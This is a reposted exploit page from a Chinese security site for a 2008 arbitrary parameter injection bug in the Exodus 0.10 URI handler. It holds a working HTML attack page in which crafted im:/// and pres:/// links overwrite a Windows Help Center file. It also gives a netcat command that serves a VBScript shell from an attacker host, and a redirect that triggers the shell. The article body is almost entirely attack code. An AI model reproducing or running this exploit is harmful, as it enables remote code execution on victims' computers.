首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Exodus 0.10 (uri handler) Arbitrary Parameter Injection Exploit
来源:Nine:Situations:Group::strawdog 作者:strawdog 发布时间:2008-11-21  
<!--
Exodus v0.10 remote code execution exploit
by Nine:Situations:Group::strawdog

This uses the "-l" argument to overwrite a file
inside Microsoft Help and Support Center folders (oh rgod...)

Firstly run netcat in listen mode to drop the vbscript shell
run this script:

@echo off
rem dropsh.cmd
echo ^<SCRIPT LANGUAGE="VBScript"^> > testfile
echo Dim wshShell >> testfile
echo Set wshShell = CreateObject("WScript.Shell") >> testfile
echo wshShell.Run("cmd /c start calc") >> testfile
echo ^</SCRIPT^> >> testfile
nc -L -s 192.168.0.1 -p 5222 -vv < testfile

-->
<html>
<head>
<script type="text/javascript">
<!--
function doRedirect() {
location.href = "hcp://system/sysinfo/msinfo.htm";
}
function runcalc() {
window.setTimeout("doRedirect()", 10000);
}
//-->
</script>
<a href="im:///'%20-l%20C:\WINDOWS\PCHEALTH\HELPCTR\System\sysinfo\msinfo.htm%20-j%20strawdog@192.168.0.1%20-p%20AAAA%20%00" onClick="runcalc()">click me</a><br>
<a href="pres:///'%20-l%20C:\WINDOWS\PCHEALTH\HELPCTR\System\sysinfo\msinfo.htm%20-j%20strawdog@192.168.0.1%20-p%20AAAA%20%00" onClick="runcalc()">click me</a>
</html>

 
[收藏] [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
用户名: 新注册) 密码: 匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·3ctftpsvc Buffer Overflow (Lon
·Internet Explorer 6.0 SP2 File
·动网上传漏洞利用工具Gui版(De
·VMware 5.5.1 COM Object Arbitr
·Guestbara <= 1.2 Change Admin
·Internet Explorer Version 6.0.
·The IIS Worker Process (w3wp)
·SPIDynamics WebInspect Cross-A
·phpwind 5.x exploits
·serv-u本地权限提升工具|
·oneSCHOOL (all versions) admin
·Macromedia Flash Player Flash.
  相关文章
·Portfolio <= 0.3 Remote Arbitr
·PunBB Mod PunPortal 0.1 Local
·Exploits Microsoft VISTA TCP/I
·wPortfolio <= 0.3 Admin Passwo
·MauryCMS <= 0.53.2 Remote Shel
·PHP-Fusion 7.00.1 (messages.ph
·MyTopix <= 1.3.0 (notes send)
·vBulletin 3.7.3 Visitor Messag
·PunBB (Private Messaging Syste
·Oracle Database Vault ptrace(
·Chilkat Socket activex 2.3.1.1
·Discuz! Reset User Password Vu
  推荐广告
CopyRight © 2002-2009 VFocuS.Net All Rights Reserved